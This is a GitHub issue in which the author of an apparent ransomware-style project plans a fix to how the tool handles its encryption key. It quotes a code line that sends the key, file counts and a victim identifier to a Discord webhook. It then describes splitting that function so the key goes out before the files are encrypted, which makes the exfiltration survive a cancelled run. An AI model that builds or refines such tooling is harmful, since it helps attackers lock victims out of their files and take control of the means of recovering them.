Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Enc. Key is sent after everything is done #1

Open
truelockmc opened this issue Jan 13, 2025 · 0 comments
Open

Enc. Key is sent after everything is done #1

truelockmc opened this issue Jan 13, 2025 · 0 comments
Labels
bug Something isn't working

Comments

@truelockmc
Copy link
Owner

Thats bad, bcs it makes that if the Encryption is cancelled, theres no way to recover your files.

Thats bad, i will fix that when i have my windows laptop back...

How:

    # Send the key, encryption stats, and identifier code to the Discord webhook
    send_key_to_discord(webhook_url, key, file_count, folder_count, identifier_code)

dupe this function, rename it and change it so it only sends the key, then move it infront of the Encryption in the main function.

So basically there should be two funcions, one that send folder, file count and identifier code,

and one that sends the Encryption Key to discord

@truelockmc truelockmc added the bug Something isn't working label Jan 13, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

1 participant